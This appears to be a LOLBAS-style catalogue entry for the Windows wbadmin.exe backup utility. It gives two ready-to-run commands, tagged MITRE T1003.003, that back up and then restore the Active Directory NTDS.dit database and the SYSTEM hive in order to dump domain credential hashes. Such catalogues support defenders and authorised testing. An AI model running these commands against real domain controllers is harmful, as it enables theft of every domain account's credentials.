wbadmin.exe

type: OSBinaries
Windows Backup Administration utility

Full path

C:\Windows\System32\wbadmin.exe

Commands

  1. DumpAdministrator, Backup Operators, SeBackupPrivilege T1003.003

    Snapshoting of Active Directory NTDS.dit database

    wbadmin start backup -backupTarget:{PATH_ABSOLUTE:folder} -include:C:\Windows\NTDS\NTDS.dit,C:\Windows\System32\config\SYSTEM -quiet

    Extract NTDS.dit and SYSTEM hive into backup virtual hard drive file (.vhdx)

    os: Windows Server

  2. DumpAdministrator, Backup Operators, SeBackupPrivilege T1003.003

    Dumping of Active Directory NTDS.dit database

    wbadmin start recovery -version:<VERSIONIDENTIFIER> -recoverytarget:{PATH_ABSOLUTE:folder} -itemtype:file -items:C:\Windows\NTDS\NTDS.dit,C:\Windows\System32\config\SYSTEM -notRestoreAcl -quiet

    Restore a version of NTDS.dit and SYSTEM hive into file path. The command wbadmin get versions can be used to find version identifiers.

    os: Windows Server

Detection

Resources